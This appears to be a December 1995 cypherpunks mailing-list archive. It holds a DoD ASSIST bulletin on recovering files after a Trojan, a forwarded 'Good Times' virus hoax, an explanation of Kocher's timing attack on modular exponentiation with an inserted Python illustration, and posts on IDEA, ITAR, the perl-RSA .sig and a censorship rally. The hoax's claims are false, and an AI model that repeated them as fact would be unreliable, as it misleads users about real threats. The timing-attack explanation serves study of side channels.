     disk before trying to recover your hard drive.  The files are deleted 
     with the DOS del command, and can be recovered with the DOS undelete 
     command.  The files are still on your disk, only the directory 
     entries have been removed.  If you copy any new files onto your hard 
     disk, they will likely be written over the deleted files, making it
     impossible to recover the deleted files.
     
     If you have delete protection installed on your system, recovery will 
     be relatively easy.  If not, the DOS undelete command can be used, 
     but you will have to supply the first letter of each file name as it 
     is recovered.  In many cases, you will probably want to restore the 
     directories by reinstalling them from the original installation disks, 
     but do that last.  You must recover any unreplaceable files first 
     using undelete and then replace any others by copying or reinstalling 
     them from the distribution disks.
     
     To recover the system:
     (1) Boot the system with a clean, locked floppy containing the 
     recovery program for the recovery files you have installed, or the 
     DOS UNDELETE.EXE program if you do not have recovery files installed.
     
     (2) Type the VIRUS.BAT file to get a list of the directories the 
     Trojan tried to delete.  Ignore any directories that don't exist on 
     your machine.
     
     (3) Run the recovery program and recover your files. You may have to 
     help it find the recovery files, such as MIRROR, which will be in the 
     root directory.  You may have to recover the MIRROR file first and 
     then use it to recover the other files.
     
     If you are using only the DOS undelete command, type:
     
        undelete directory
     
     where directory is the name of the directory to examine. To undelete 
     the files in the dos directory, use:
     
        undelete c:\dos
     
     The undelete program will present you with a list of deleted files 
     with the first letter replaced with a question mark.  Without delete 
     protection, you will have to supply this letter in order to undelete 
     the file.
     
     (4) After you have restored as many files as you want or can using 
     the UNDELETE command, replace any others by reinstalling them using 
     the original installation disks.
     
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
     
     ASSIST would like to thank the Department of Energy CIAC for 
     information contained in this bulletin.
     
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
     
     ASSIST is an element of the Defense Information Systems Agency 
     (DISA), and provides service to the entire DoD community. 
     Constituents of the DoD with questions about ASSIST or computer 
     security issues, can contact ASSIST using one of the methods listed 
     below.  Non-DoD organizations/institutions, contact the Forum of 
     Incident Response and Security Teams (FIRST) representative.  To 
     obtain a list of FIRST member organizations and their constituencies 
     send an email to docserver@first.org with an empty "subject" line 
     and a message body containing the line "send first-contacts".
     
     ASSIST Information Resources: To be included in the distribution
     list for the ASSIST bulletins, send your Milnet (Internet) e-mail
     address to assist-request@assist.mil.  Back issues of ASSIST 
     bulletins, and other security related information, are available
     from the ASSIST BBS at 703-607-4710, 327-4710, and through anonymous 
     FTP from assist.mil (IP address 199.211.123.11).  Note: assist.mil 
     will only accept anonymous FTP connections from Milnet addresses 
     that are registered with the NIC or DNS.  If your system is not 
     registered, you must provide your MILNET IP address to ASSIST before 
     access can be provided.
      
     ASSIST Contact Information:
     PHONE: 800-357-4231, COMM 703-607-4700, DSN 327-4700.
     ELECTRONIC MAIL: assist@assist.mil.
     ASSIST BBS: COMM 703-607-4710, DSN 327-4710, leave a message for
     the "sysop".  
     FAX: COMM 703-607-4735, DSN 607-4735
     
     ASSIST uses Pretty Good Privacy (PGP) 2.6.2 as the digital 
     signature mechanism for bulletins.   PGP 2.6.2 incorporates the 
     RSAREF(tm) Cryptographic Toolkit under license from RSA Data 
     Security, Inc.  A copy of that license is available via anonymous 
     FTP from net-dist.mit.edu (IP 18.72.0.3) in the file 
     /pub/PGP/rsalicen.txt, and through the world wide web from
     http://net-dist.mit.edu/pgp.html.  In accordance with the terms 
     of that license,  PGP 2.6.2 may be used for non-commercial 
     purposes only.  Instructions for downloading the PGP 2.6.2 
     software can also be obtained from net-dist.mit.edu in the 
     pub/PGP/README file.  PGP 2.6.2 and RSAREF may be subject to the 
     export control laws of the United States of America as 
     implemented by the United States Department of State Office of 
     Defense Trade Controls.  The PGP signature information will be 
     attached to the end of ASSIST bulletins.
       
     Reference herein to any specific commercial product, process, or
     service by trade name, trademark manufacturer, or otherwise, does
     not constitute or imply its endorsement, recommendation, or
     favoring by ASSIST.  The views and opinions of authors expressed
     herein shall not be used for advertising or product endorsement
     purposes. 
     
     -----BEGIN PGP SIGNATURE-----
     Version: 2.6
     
     iQCVAwUBMMNldNH6sbnW3Io9AQEojQQAoRB5w3+MigtmYkosgh94ttXFwt77VJmC
     n8b5SVZgD4pmXss12ZLLvSsXC8/+4Kp4IyHKyvie/nu7mmEZN4RcDy2N3IGa6Rmk
     ydVqJ9BvCSxNUNwwdxOMPj/Cu5Pmv1ssoIDdXVXMn11n3Ti97HiElj3VJP7DlH8w
     ZNoFm4DydgM=
     =MKi5
     -----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WheatonB@603cs.croughton.af.mil
Date: Wed, 13 Dec 1995 03:24:21 +0800
To: CYPHERPUNKS@toad.com
Subject: F. Y. I.
Message-ID: <9511128188.AA818815409@603cs.croughton.af.mil>
MIME-Version: 1.0
Content-Type: text/plain


     To all.  This is something I received from a fellow Internet user in 
     the States.  I don't know where he got this info, but I thought we may 
     all benefit from this warning.
     
     SrA Lounsbury sends...

______________________________ Forward Header __________________________________
         
         Just in case you missed this info....
     
>>>>>>SUBJECT:  VIRUSES--IMPORTANT PLEASE READ IMMEDIATELY 
>>>>>>
>>>>>>      There is a computer virus that is being sent across the 
>>>>>>Internet.   If you receive an e-mail message with the subject 
>>>>>>line "Good  Times",   DO NOT  read  the  message,  DELETE  it 
>>>>>>immediately.  Please read the messages below.  Some miscreant 
>>>>>>is sending  e-mail under  the title "Good Times" nation wide, 
>>>>>>if you  get anything like this, DON'T DOWN LOAD THE FILE!  It 
>>>>>>has a  virus that  rewrites  your  hard  drive,  obliterating 
>>>>>>anything on  it.  Please be careful and forward this mail to 
>>>>>>anyone you care about.
>>>>>>
>>>>>>************************************************************* 
>>>>>>
>>>>>>WARNING!!!!!!!  INTERNET VIRUS 
>>>>>>
>>>>>>      The FCC  released a warning last Wednesday concerning a 
>>>>>>matter of  major  importance  to  any  regular  user  of  the 
>>>>>>Internet.     Apparently  a   new  computer  virus  has  been 
>>>>>>engineered by  a user of AMERICA ON LINE that is unparalleled 
>>>>>>in its destructive capability.  Other more well-known viruses 
>>>>>>such as  "Stoned",  "Airwolf"  and  "Michaelangelo"  pale  in 
>>>>>>comparison to  the prospects  of this  newest creation  by  a 
>>>>>>warped mentality.   What makes this virus so terrifying, said 
>>>>>>the FCC,  is the  fact that  no program needs to be exchanged 
>>>>>>for a  new computer to be infected.  It can be spread through 
>>>>>>the existing e-mail systems of the Internet.  Once a computer 
>>>>>>is infected,  one of  several things  can  happen.    If  the 
>>>>>>computer contains  a hard  drive, that  will most  likely be 
>>>>>>destroyed.   If the  program is  not stopped,  the computer's 
>>>>>>processor will be placed in an nth-complexity infinite binary 
>>>>>>loop -which can severely damage the processor if left running 
>>>>>>that way too long.
>>>>>>
>>>>>>      Unfortunately, most  novice  computer  users  will  not 
>>>>>>realize what is happening until it is far too late.  Luckily, 
>>>>>>there is one sure means of detecting what is now known as the 
>>>>>>"Good Times"  virus.   It always travels to new computers the 
>>>>>>same way  in a  text email  message  with  the  subject  line 
>>>>>>reading "Good  Times".   Avoiding infection  is easy once the 
>>>>>>file has been received- not reading it!    The act of loading 
>>>>>>the file into the mail server's ASCII buffer causes the "Good 
>>>>>>Times" mainline program to initialize and execute.
>>>>>>
>>>>>>    The program is highly intelligent- it will send copies of 
>>>>>>itself to  everyone whose  e-mail address  is contained  in a 
>>>>>>receive-mail file or a sent-mail file, if it can find one. It 
>>>>>>will then proceed to trash the computer it is running on. The 
>>>>>>bottom line  here is - if you receive a file with the subject 
>>>>>>line "Good  Times", delete  it immediately!   Do not read it" 
>>>>>>Rest assured  that whoever's  name was on the "From" line was 
>>>>>>surely struck  by the  virus.   Warn your  friends and  local 
>>>>>>system users  of this newest threat to the Internet! It could 
>>>>>>save them a lot of time and money.
     
_________________________________________________________ 
Category:
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 14 Dec 1995 00:10:20 +0800
To: cypherpunks@toad.com
Subject: SmartGate
Message-ID: <01HYQ7HJ7XTC8Y4YHK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This looks like they're using Diffie-Hellman. Does anyone know anything
further?
	-Allen

---------------------------
>
   Reuters New Media
   
   _ Tuesday December 12 6:33 AM EST _
   
V-One Unveils Internet Security Technology

   
   
   ROCKVILLE, Md. (Reuter) - V-One Corp. says it has introduced security
   technology called SmartGate that enables companies to build a secure
   system to conduct transactions on the Internet computer network.
   
   SmartGate is transaction-based software that uses encryption to ensure
   protection over an open network, the privately held company said
   Monday.
   
   Encryption scrambles the data and in the SmartGate system, a key to
   decode the data is generated that is unique to a specific transaction
   session.
   
   V-One, which stands for Virtual Open Network Environment, said
   SmartGate is available now directly from the Rockville, Md.-based
   company.
   
   It said SmartGate can be purchased in either a hardware-software or
   software-only form. The SmartGate server retails for $9,995 and the
   software-only version is $4,995. A server is a computer that manages the
   flow of data in a network. SmartGate licenses are priced at $79, with
   reductions offered for volume purchases.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Wed, 13 Dec 1995 10:29:06 +0800
To: cypherpunks@toad.com
Subject: Re: Wanted: email for Calif senators & representatives
In-Reply-To: <9511128188.AA818800342@snail.rsa.com>
Message-ID: <4akv20$965@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


"baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> writes:

>        Can someone send me, or the list, the email addresses for
>the California senators and representatives?

You can access the entire house through http://www.house.gov/Welcome.html.
http://policy.net/ has a number of good references to legislators; you may
be able to find your senator through it.
-- 
"I tracked down why mail to you wasn't getting thru.  When it comes to
getting someone to fix something, often it's not what you know, or who
you know, but who you just might embarrass in front of their customers.
It's now fixed."      	-- me, in email to a friend




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Dec 1995 11:13:07 +0800
To: cypherpunks@toad.com
Subject: Re: Time-based cryptanalysis: How to defeat it?
Message-ID: <199512130144.RAA08950@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: futplex@pseudonym.com (Futplex)
> I don't understand why Kocher's point is correct. For example, why do the
> times diverge with the following modification of the modexp algorithm on
> pg.2 of the abstract ?
> 
> 	Algorithm to compute R = y^x mod n:
> 		Let R_0 = 1.
> 		Let y_0 = y.
> 		For i = 0 upto (bits_in_x - 1):
> 			Let M = (R_i * y_i) mod n.
> 			Let R_(i+1) = (bit i of x) * M  +
> 					(1 - (bit i of x)) * R_i.
> 			Let y_(i+1) = (y_i)^2 mod n.
> 		End.

I posted a similar idea on sci.crypt, but later I realized that Paul Kocher
is right.

Your algorithm works OK for the first iteration.  The amount of work is
pretty much constant regardless of whether bit 0 of x is 0 or 1.
However, at the end of that iteration R_1 will have one of two
different values depending on that bit 0 value.  And, the attacker can
know these two values, and if he controls y he can even choose them
(they will be either y or 1).

Now, on the next iteration, the time it takes will be different
depending on bit 0 of x.  It won't depend on the bit 1 value, but
different bit 0 values will cause R_1 to be different.  So the time of
this iteration will depend on the value of the bit used in the previous
iteration, and likewise for the following iterations.

If the attacker can choose y, he can arrange that the two different R_1
values will take different times on average for the rest of the
calculation.  So he finds out bit 0 as before, and from there he can go
on and find the other bits.

Hal
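
The argument above, as an added Python illustration (not code from the thread or from Kocher's abstract): Futplex's branch-free loop is traced under an assumed cost model in which a multiply costs the product of its operands' bit lengths. The modulus, base and exponents are constructed sample values.

```python
# Added illustration, not code from the thread. The cost model is an
# assumption: multiply cost = product of the operands' bit lengths.

N = 2**61 - 1                 # constructed modulus (a Mersenne prime)
Y = 0x123456789ABCDEF         # constructed base, 1 < Y < N - 1


def mul_cost(a, b):
    """Modelled cost of one multiprecision multiply a * b."""
    return max(a.bit_length(), 1) * max(b.bit_length(), 1)


def modexp_trace(y, x, n, bits):
    """Futplex's branch-free loop; returns (R, [cost of each iteration])."""
    r, yi = 1, y % n
    costs = []
    for i in range(bits):
        bit = (x >> i) & 1
        cost = mul_cost(r, yi)           # M = (R_i * y_i) mod n, always computed
        m = (r * yi) % n
        r = bit * m + (1 - bit) * r      # arithmetic select, no branch on the bit
        cost += mul_cost(yi, yi)         # y_(i+1) = (y_i)^2 mod n
        yi = (yi * yi) % n
        costs.append(cost)
    return r, costs


def first_divergence(xa, xb, y=Y, n=N, bits=4):
    """Index of the first iteration whose modelled cost differs, else None."""
    _, ca = modexp_trace(y, xa, n, bits)
    _, cb = modexp_trace(y, xb, n, bits)
    for i, (a, b) in enumerate(zip(ca, cb)):
        if a != b:
            return i
    return None


if __name__ == "__main__":
    # Exponents differing only in bit 0, then only in bit 1.
    for xa, xb in [(0b1010, 0b1011), (0b0000, 0b0010)]:
        print(f"x={xa:04b} vs x={xb:04b}: costs diverge at iteration",
              first_divergence(xa, xb))
```

Iteration i itself costs the same for either value of bit i, but the operand R_(i+1) it leaves behind differs, so the cost of iteration i+1 onward depends on bit i.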




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 13 Dec 1995 09:51:33 +0800
To: cypherpunks@toad.com
Subject: IDEA encryption
Message-ID: <Pine.A32.3.91.951212174132.26320B-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



The copy of the source for idea (unix) that I have specifies a user key 
length of 8 bytes, but allows this to be increased to something larger. 
Will increasing the user keylength improve the overall security? 

Also, is it worth hashing the user key first, then using the hashed key 
as the key for encryption and decryption? Or am I wasting my time? 

Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
really really gone? 

Thnks..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Wed, 13 Dec 1995 10:26:50 +0800
To: A&SUser@cctr.umkc.edu
Subject: Re: Pornographic stories
Message-ID: <9512122251.AA03113@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


A&SUser writes:
>Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. 
> I'm not sure how you do your Pornographic server, so I'll just ask 
>again.  I know I would be VERY gratful if you could send me any XXX 
>stories, I love to read them.  I could reward you over the net somehow 
>I'm sure.  
>my adress is mphillips@cctr.umkc.edu
>
>Thanks....I'll be waiting.
>
What the hell are you talking about??  This is the cypherpunks mailing list!!
Jeses, try alt.sex.stories. :P

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 13 Dec 1995 12:18:22 +0800
To: cypherpunks@toad.com
Subject: Thursday noon, SF: Meatspace rally against cyberspace censorship
Message-ID: <9512130233.AA20672@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday's rally was canceled on account of rain.  There is now a backup
location in case of rain on Thursday.  Check the web page before you leave,
or come to South Park, and the backup location will be close by.  See you
there!     -- John

Date: Tue, 12 Dec 1995 18:15:44 -0800 (PST)
From: protest@wired.com (--Todd Lappin-->)
Subject: SF RALLY -- THURSDAY

This is an updated announcement for Thursday's Rally Against Censorship,
with the current list of speakers.  The rally will take place rain or
shine, so hope for the best, bring an umbrella, and spread the word.
Thanks!


                *** NETIZENS!! RALLY AGAINST CENSORSHIP ***

                         Thursday, December 14, 1995
                       at South Park, 12:00 - 1:00 PM
                          San Francisco, California

                           --  Rain or Shine!  --

     **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST **


Amendment I: "Congress shall make no law ... abridging the freedom of
speech, or of the press; or the right of the people peaceably to assemble."


     **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST **

It's like illiterates telling you what to read. On December 6 members of
the House Conference Committee on Telecommunications Reform approved a
proposal to censor free speech in cyberspace. If the measures are adopted,
the Net and online media will become the most heavily regulated media in
the United States. They *will not* enjoy the First Amendment freedoms now
afforded to print media. Instead, online publishers and users will be held
to a vague and patently un-Constitutional "indecency" standard. "Violators"
will be subject to fines of up to $100,000 and prison terms of up to five
years.

In response, ALL members of the Bay Area media, online, Internet, new
media, and telecommunications communities are invited to participate in a
protest rally to express our outrage that the politicians in Congress
(which is not even connected to the Internet!) are attempting to destroy
our First Amendment rights in cyberspace, and directly attack our
livelihoods.

Help stop the demagogues in Washington! There is nothing "decent" about
denying free speech to us, our children, and our children's children.
Preserve our Constitutional rights! Join us!

WHEN: Thursday, December 14, 1995  12:00 - 1:00 PM

WHERE: South Park (between 2nd and 3rd, Bryant and Brannan) San Francisco.
       (In the event of rain, an indoor location will be announced)

SPEAKERS: Mike Godwin, EFF; John Gilmore, co-founder, EFF; Denise Caruso,
New York Times columnist; Jim Warren, online activist; Howard Rheingold,
author; Dave Winer, essayist and software developer; Audrie Krause,
Executive Director, CPSR; Jonathan Steuer, CEO, Cyborganic Corp; Michael
Goldberg, Publisher, Addicted To Noise.

BRING: Attention-grabbing posters, signs, and banners that demonstrate your
commitment to free speech and expression, and your feelings about
Congress.

FOR UPDATED INFORMATION: http://www.hotwired.com/staff/digaman

(Although this event is being organized in the offices of Wired magazine
and HotWired, we are *actively* seeking participation and support from all
members of the local community. Please forward this message to anyone you
think should attend, and to all relevant news groups.)

CONTACT: Todd Lappin -- 415-222-6241 -- protest@wired.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjm@easynet.co.uk (Terence Joseph Mallon)
Date: Wed, 13 Dec 1995 02:38:33 +0800
To: cypherpunks@toad.com
Subject: YOUR ADVICE AND HELP PLEASE......
Message-ID: <v01530500acf3760e23db@[194.154.96.141]>
MIME-Version: 1.0
Content-Type: text/plain


Dear fellow Cypherpunks,

I write to ask for your help.

In the new year I am to begin a three level internet course - beginners,
intermediate and advanced. Both privacy and security have been and are an
interest of mine  and unlike many courses which I have approached and
conversed with I do not see these areas as some remote aspect of the
advanced level - I see them as constituents of each level, throughout the
levels, and certainly from the beginning - as I have lurked here for the
past while as a subscriber and prior that from afar I believe we all would
agree with this.

Yes, I am a virgin cypherpunk but not a virgin to both privacy and security
as growing up in Northern Ireland I have seen them both in abundance and at
other times lacking - the official / the unofficial - how they both took
away life....

What I write to ask for is some pointers to direct me and if possible some
personal comments in regards to these aspects. I personally use PGP but am
ignorant to where this program is in the broader field of cryptography and
what other programs are which have been mentioned on the mailing list.

Excuse my lack of knowledge in technical terms but I am acute to them in
the realm of the street. THE STREETS HAVE CHANGED TO CABLES AND THE
BUILDINGS HAVE BECOME CPUs - WE ARE ALL
GRAPHICS/TEXT/SOUNDS/VIDEO...........LANGUAGE.

Can you please help me, as this information shall be passed on to others to
make them aware and to help them - as it has helped you all, as it is
helping me....

Thanking you all, in anticipation of hearing from you and wishing all a
very happy as well as a safe Xmas and a lucky new year.

Yours faithfully,

Terence.


"Irish eyes are smiling, I miss the emerald isle."










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 13 Dec 1995 11:01:38 +0800
To: cypherpunks@toad.com
Subject: Re: Wanted: email for Calif senators & representatives
In-Reply-To: <9511128188.AA818800342@snail.rsa.com>
Message-ID: <Pine.LNX.3.91.951212194529.200A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Dec 1995, baldwin wrote:

>         Can someone send me, or the list, the email addresses for
> the California senators and representatives?
>                 --Bob Baldwin
> 
> 
> 

Here's the list:  (Note: I do not know if this is complete)

Barabara Boxer       senator@boxer.senate.gov
Dianne Feinstein     senator@feinstein.senate.gov
Bill Baker           BBAKER@hr.house.gov
George Brown         TALK2GEB@hr.house.gov
Anna Eshoo           ANNAGRAM@hr.house.gov
Sam Farr             SAMFARR@hr.house.gov
Vic Fazio            DCAUCUS@hr.house.gov
Jane Harman          JHARMAN@hr.house.gov
Tom Lantos           TALK2TOM@hr.house.gov
Zoe Lofgren          ZOEGRAM@hr.house.gov
Howard McKeon        TELLBUCK@hr.house.gov
George Miller        GMILLER@hr.house.gov
Ron Packard          RPACKARD@hr.house.gov
Nancy Pelosi         SFNANCY@hr.house.gov
George Radanovich    GEORGE@hr.house.gov
Andrea Seastrand     ANDREA22@hr.house.gov
Pete Stark           PETEMAIL@hr.house.gov
Walter R. Tucker     TUCKER96@hr.house.gov
Lynn C. Woolsey      WOOLSEY@hr.house.gov

If anyone wants a list of all reps and senators, you can get them at
http://www.house.gov/ and ftp://ftp.senate.gov respectively.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM4i7LZc+sv5siulAQGqAQP7B0GxtK39t+GKSY9vmxgdMfEh3pFGsjnd
NzXtuZbHuHUDHtQjHY3mcLWBQupjrwy9lRMfjMzeP3sDgjuf2sLMEko94hzSUlo9
yBAvprqkRDt71cp58uZm2fSimFFxa7G4EFAx1HF/AD6iy0zD9WNF7uwkO58IRtzB
l6mQKvwnFFU=
=kFtx
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 13 Dec 1995 05:08:45 +0800
To: cypherpunks@toad.com
Subject: chaotic signal cryptography
Message-ID: <199512121900.UAA00315@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995 12:00:38 -0500 (EST), L. Den-Hollander wrote (in part):
>A few years back i ran thru a paper emanating
>from a navy labs researcher (i think the name was Peccora)
>about using synchronised chaotic signal generators as a
>signal scrambling/encryption scheme.

I too am interested in this technique.  I may be wrong, but it seems like
a variation on the one-time pad.  Any comments on this technique (usefulness,
robustness, etc.)?

	Hooker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 13 Dec 1995 10:33:50 +0800
To: cypherpunks@toad.com
Subject: BIO-MUNITION: gifs of perl-RSA tattoo
Message-ID: <730.9512122013@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



People who have been reading the list for a while will be familiar with
this piece of perl code used as a non-exportable, supposedly ITAR
controlled .sig:


#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)


which is an implementation of RSA encryption in perl optimised for
size.

A lot of list bandwidth a while back was consumed with discussion of
the T-shirt versions of this .sig.  More info on the .sig, and T-shirt at:

.sig:		http://www.dcs.ex.ac.uk/~aba/rsa/
t-shirts:	http://www.obscura.com/~shirt/

Update wrt the idea of using the .sig for a tattoo:

Richard White <maldoror@pacificnet.net> had his wife (who is a tattoo
artist) put a tattoo of this code on his forearm.

Gif of Richard's tattoo now available here:

	http://www.dcs.ex.ac.uk/~aba/rsa/tattoo.html

This means that he may, technically, qualify as a munitions on the
USML, and as a result not be allowed to show the tattoo to a foreign
national in the US, nor leave the US.

Note it says _technically_ above, as there was much discussion on the
list re the shirts as to whether the shirt actually would ever be
classified as a munition due to the impracticality of using a shirt as
a distribution media, and silliness factor.  We shall see wrt the
shirt when and if Raph receives a determination from his CJR for the
shirt.  (I would note that someone posted a while ago that they did
manage to get the barcode to scan, on I think one of Joel Furr's
shirts).  Also the secondary claim about whether or not ITAR
stipulates that a software item can be shown to a foreign national in
the US seems open to debate (some say ITAR strictly interpreted does
say this, others say not).

Also something about the anti-ITAR fight recently which was an eye
opener for me was that I took a look at Phil Karn's export page to do
with his ongoing battle against ITAR as applied to crypto, with the
Applied Crypto disk/book case:

	http://www.qualcomm.com/people/pkarn/export/

In his court transcripts there is a declaration by Phil Zimmermann in
connection with the Applied Crypto case, however he (PRZ) also
mentions the unofficial progress on his PGP source code book published
by MIT press.

PRZs declaration from bottom of:

	http://www.qualcomm.com/people/pkarn/export/zimm.html

> 10. I believe that the commodity jurisdiction request referred on page
> 28 of the Justice filing is the one which was filed by MIT Press for
> my book, PGP: Source Code and Internals. I am further informally
> advised that the National Security Agency has considered the Request
> and recommended that the book be controlled for export under the ITAR
> and that the Department of Commerce has recommended that it not be
> subject to ITAR controls.

Wow!  If this informal info is confirmed as the NSAs determination, it
will have interesting ramifications for the distinction between paper
based publications and electronic.  It will also reinforce Phil Karn's
use of the charge of "arbitrary, [and] capricious" enforcement on the
part of the NSA/ODTC, as the CJR for Applied Crypto in print form was
successful.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 13 Dec 1995 11:39:56 +0800
To: cypherpunks@toad.com
Subject: Re: Pornographic stories
In-Reply-To: <9512122251.AA03113@envirolink.org>
Message-ID: <ND11FD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel Miskell <DMiskell@envirolink.org> writes:
> A&SUser writes:
> >Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago.
> > I'm not sure how you do your Pornographic server, so I'll just ask
> >again.  I know I would be VERY gratful if you could send me any XXX
> >stories, I love to read them.  I could reward you over the net somehow
> >I'm sure.
> >my adress is mphillips@cctr.umkc.edu
> >
> >Thanks....I'll be waiting.
> >
> What the hell are you talking about??  This is the cypherpunks mailing list!!
> Jeses, try alt.sex.stories. :P

If you can read Russian, you can read pornography on soc.culture.russian. :)

I too fail to see the cryptorelevance of this thread... Unless alt.sex.stories
is used for steganography... Alice wants to send a secret message to Bob, so
she posts a porn story to alt.sex.stories, where the key phrase is "That was
the best sex I've ever had", which sounds like a mild hyperbole to most people;
only Bob knows that it really means "the bomb is scheduled to detonate at
midnight." But what's it got to do with writing code??? :) :)

(Does Molly=Lance?)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 13 Dec 1995 11:15:48 +0800
To: cypherpunks@toad.com
Subject: Re: IDEA encryption
In-Reply-To: <Pine.A32.3.91.951212174132.26320B-100000@hopi.gate.net>
Message-ID: <Pine.LNX.3.91.951212212447.94B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Dec 1995, Ben Holiday wrote:

> 
> The copy of the source for idea (unix) that I have specify's a user key 
> length of 8 bytes, but allows this to be increased to something larger. 
> Will increasing the user keylength improve the overall security? 
> 
IDEA uses 128-bit keys.  The program must do some XORing with the user key
to expand it to 16 bytes.  Therefore, I would guess that it would be more
secure to use a longer key.

> Also, is it worth hashing the user key first, then using the hashed key 
> as the key for encryption and decryption? Or am I wasting my time? 
> 
It probably isn't going to help with security at all if you plan to use a
hexadecimal representation of the hash as is the common output of hashing
programs.  The best key would be one that uses random letters, numbers, and
symbols.

> Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
> really really gone? 
> 

Not very secure.  I have heard that there is a Linux undelete and there might
be a similar program for other Unices.  If the hard drive is examined using
special hardware, data will be recoverable.  The data should be overwritten
at least five times, maybe more depending on the level of security you want,
before being deleted.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM46pLZc+sv5siulAQFZgwQAh/TFur/p9yMlTD9qM0/sT6olo6aKGjGb
OGas4p939mqfPdCu4LFyD6Tcg79YA90a108IEcE+rQB4o40/zDSkvoEUOz7a6nlb
vqxI6Lv8Qdv40mVmH9Bxd9OhX+Vgsb7pkTHj9ViHlw9X2xjnwOSiKAu7nRupG1Tj
A3IrqyCGapA=
=us1o
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Thu, 14 Dec 1995 06:22:46 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: IDEA encryption
In-Reply-To: <Pine.A32.3.91.951212174132.26320B-100000@hopi.gate.net>
Message-ID: <199512130237.VAA21019@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> The copy of the source for idea (unix) that I have specify's a user key 
> length of 8 bytes, but allows this to be increased to something larger. 
> Will increasing the user keylength improve the overall security? 

Umm, I think you are confused.  First, IDEA has a keysize of 16 bytes,
